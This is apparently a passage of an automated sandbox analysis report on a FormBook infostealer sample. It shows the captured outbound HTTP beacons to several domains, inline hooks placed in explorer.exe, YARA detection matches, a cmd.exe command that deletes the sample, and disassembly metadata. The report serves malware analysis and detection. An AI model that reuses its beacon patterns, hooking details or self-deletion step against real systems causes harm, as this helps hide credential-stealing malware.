Sep 7, 2023 08:39:02.193577051 CEST  154                 IN         Data Raw: 6e 74 61 69 6e 65 72 7b 67 72 69 64 2d 61 72 65 61 3a 31 2f 32 2f 32 2f 36 7d 2e 6c 65 66 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 69 6d 67 2e 73 65 64 6f 70 61
                                    Data Ascii: ntainer{grid-area:1/2/2/6}.left-container{background-image:url("https://img.sedoparking.com/templates/bg/NameSiloLogo.png");background-size:9vw;background-repeat:no-repeat;margin-right:10px;grid-area:1/1/2/2} </style><script type="text/ja


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.8  49772        104.21.48.68    80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Sep 7, 2023 08:39:22.654042959 CEST  166                 OUT        GET /us94/?FV9l7b=dEK1UcEseC60ArM7bnAGctGEpZul5aHqilxPZgyrfd7+4uauQhfO1u/GuBaUBJFU+KOU&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.nazadypro.shop
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
Sep 7, 2023 08:39:22.856993914 CEST  167                 IN         HTTP/1.1 404 Not Found
                                    Date: Thu, 07 Sep 2023 06:39:22 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kTYDAkJwCyw0%2BnhK7NN2bcwb94Iew%2FOYP2vLbo1Mp%2BeteJHtybie0loptL9iJqTk55Y3OiGn4digZd6g4%2BoNGUC4NxW6%2FXzw5tX3zUoews%2B3g0ZC575%2BgflLHEfb2IbFUbaSogI%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 802cf4470aa209f7-LAS
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Sep 7, 2023 08:39:22.857034922 CEST  167                 IN         Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.8  49773        66.235.200.145  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Sep 7, 2023 08:39:43.584228992 CEST  168                 OUT        GET /us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.soccercitycupsc.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
Sep 7, 2023 08:39:43.939963102 CEST  168                 IN         HTTP/1.1 301 Moved Permanently
                                    Date: Thu, 07 Sep 2023 06:39:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                    X-Redirect-By: WordPress
                                    Content-Security-Policy: upgrade-insecure-requests
                                    Location: http://soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                    X-Endurance-Cache-Level: 0
                                    X-nginx-cache: WordPress
                                    CF-Cache-Status: MISS
                                    Server: cloudflare
                                    CF-RAY: 802cf4c9db4209f9-LAS
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
3           192.168.2.8  49774        34.120.175.65   80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Sep 7, 2023 08:40:07.074596882 CEST  169                 OUT        GET /us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.69v39.top
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
Sep 7, 2023 08:40:07.392153978 CEST  171                 IN         HTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Thu, 07 Sep 2023 06:40:07 GMT
                                    Content-Type: text/html
                                    Content-Length: 5351
                                    Last-Modified: Wed, 02 Aug 2023 04:25:02 GMT
                                    Vary: Accept-Encoding
                                    ETag: "64c9da9e-14e7"
                                    Cache-Control: no-cache
                                    Accept-Ranges: bytes
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 33 39 2e 31 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 
73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f
                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.39.11",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}functio
Sep 7, 2023 08:40:07.392225981 CEST  172                 IN         Data Raw: 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5
                                    Data Ascii: n baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function sen
Sep 7, 2023 08:40:07.392257929 CEST  172                 IN         Data Raw: 79 28 69 29 26 26 74 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29
                                    Data Ascii: y(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||
Sep 7, 2023 08:40:07.392286062 CEST  174                 IN         Data Raw: 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62
                                    Data Ascii: d"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&
                                    Sep 7, 2023 08:40:07.392321110 CEST175INData Raw:
                                    Data Ascii: n","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossori
                                    Sep 7, 2023 08:40:07.392340899 CEST175INData Raw:
                                    Data Ascii: </div><div class="no-ad"></div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.ed78827af54b11b592f7.js"></script></body


                                    Code Manipulations

                                    Function Name | Hook Type | Active in Processes
                                    PeekMessageA | INLINE | explorer.exe
                                    PeekMessageW | INLINE | explorer.exe
                                    GetMessageW | INLINE | explorer.exe
                                    GetMessageA | INLINE | explorer.exe

                                    Function Name | Hook Type | New Data
                                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0
                                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0


                                    Target ID:1
                                    Start time:08:38:12
                                    Start date:07/09/2023
                                    Path:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Imagebase:0x600000
                                    File size:995'840 bytes
                                    MD5 hash:4F91D6F43A69717FF16F3C09DCD0E7E8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:08:38:14
                                    Start date:07/09/2023
                                    Path:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Imagebase:0xb90000
                                    File size:995'840 bytes
                                    MD5 hash:4F91D6F43A69717FF16F3C09DCD0E7E8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:08:38:15
                                    Start date:07/09/2023
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff62dba0000
                                    File size:5'308'592 bytes
                                    MD5 hash:DDB206DDECAF3B327A418B262EE33468
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.2509035504.00000000088AF000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:4
                                    Start time:08:38:18
                                    Start date:07/09/2023
                                    Path:C:\Windows\SysWOW64\msdt.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\msdt.exe
                                    Imagebase:0x7e0000
                                    File size:389'632 bytes
                                    MD5 hash:35F3075ABFA89839B62E52CD29F62954
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:false

                                    Target ID:5
                                    Start time:08:38:22
                                    Start date:07/09/2023
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\2FcJgghyXg.exe"
                                    Imagebase:0x120000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:08:38:22
                                    Start date:07/09/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff78b990000
                                    File size:873'472 bytes
                                    MD5 hash:86191D9E0E30631DB3E78E4645804358
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:11.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:180
                                      Total number of Limit Nodes:18
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 096c43fc127cf37009df0e5c3c85f0fc914ec012902d0c584d8c59eed18a8240
                                      • Instruction ID: a544322e8756d23293487166938a2b328c00330682fe24b97410f7eb166bb0e8
                                      • Opcode Fuzzy Hash: 096c43fc127cf37009df0e5c3c85f0fc914ec012902d0c584d8c59eed18a8240
                                      • Instruction Fuzzy Hash: 78C19771700B058FDB29DB69C460BAF7BEABF99602F14856DD5869B2D0DB34E802CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08504166
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: >+0$>+0
                                      • API String ID: 963392458-2378181469
                                      • Opcode ID: 6bf4af955f69c298ce3c32ee2dfc99ce29b326319afee73a73f252b6ddd1f52c
                                      • Instruction ID: ec13dbfb896bea60622345284ecfee24ea5183166f7a23f776b39f05f03173e3
                                      • Opcode Fuzzy Hash: 6bf4af955f69c298ce3c32ee2dfc99ce29b326319afee73a73f252b6ddd1f52c
                                      • Instruction Fuzzy Hash: 5AA16C71D0025ACFDF24CF68C851BEEBBB2BF48305F1481A9E909A7280DB759985CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08504166
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: >+0$>+0
                                      • API String ID: 963392458-2378181469
                                      • Opcode ID: 88e68151aeb31bdee3f7379b9da5e899630620098f60c984b16c30a29c49ae20
                                      • Instruction ID: 5c451ee0d7a1609e1221f4ff855876072c7dfd31eff25cf635fdc03714c245d9
                                      • Opcode Fuzzy Hash: 88e68151aeb31bdee3f7379b9da5e899630620098f60c984b16c30a29c49ae20
                                      • Instruction Fuzzy Hash: 8F916B71D0021ACFDF24DFA8C851BDEBBB2BF48315F148169E909A7280DB759985CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFBE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: >+0
                                      • API String ID: 4139908857-4245186874
                                      • Opcode ID: 23a133c7eb56c9c1f81941d1a0cce1d457ec532a481706910689f6d0741390a6
                                      • Instruction ID: 76e630631f7b2cd4625943d14104cd727e4c0ceb84d17546a7be433a3d33dc6a
                                      • Opcode Fuzzy Hash: 23a133c7eb56c9c1f81941d1a0cce1d457ec532a481706910689f6d0741390a6
                                      • Instruction Fuzzy Hash: 0A712470A00B05CFD7A4DF2AD45579BBBF1FF88304F008A2DD88A97A50D734E9498B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 523 10544b0-10559d9 CreateActCtxA 527 10559e2-1055a3c 523->527 528 10559db-10559e1 523->528 535 1055a3e-1055a41 527->535 536 1055a4b-1055a4f 527->536 528->527 535->536 537 1055a51-1055a5d 536->537 538 1055a60 536->538 537->538 540 1055a61 538->540 540->540
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID: >+0
                                      • API String ID: 2289755597-4245186874
                                      • Opcode ID: 4eff367d545bde50adbb880e09b6adbd2926817c905445ca0ef7cdebc89dc785
                                      • Instruction ID: 83aeb571680b4f0831755feb1d4dcfada7717b2b03573c02107ff721c8e43e0a
                                      • Opcode Fuzzy Hash: 4eff367d545bde50adbb880e09b6adbd2926817c905445ca0ef7cdebc89dc785
                                      • Instruction Fuzzy Hash: DB41E0B0C0071DCBDB24DFAAC885B9EBBF5BF49304F60806AD809AB251DB756945CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      control_flow_graph 541 105590c-105598c 543 105598f-10559d9 CreateActCtxA 541->543 545 10559e2-1055a3c 543->545 546 10559db-10559e1 543->546 553 1055a3e-1055a41 545->553 554 1055a4b-1055a4f 545->554 546->545 553->554 555 1055a51-1055a5d 554->555 556 1055a60 554->556 555->556 558 1055a61 556->558 558->558
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID: >+0
                                      • API String ID: 2289755597-4245186874
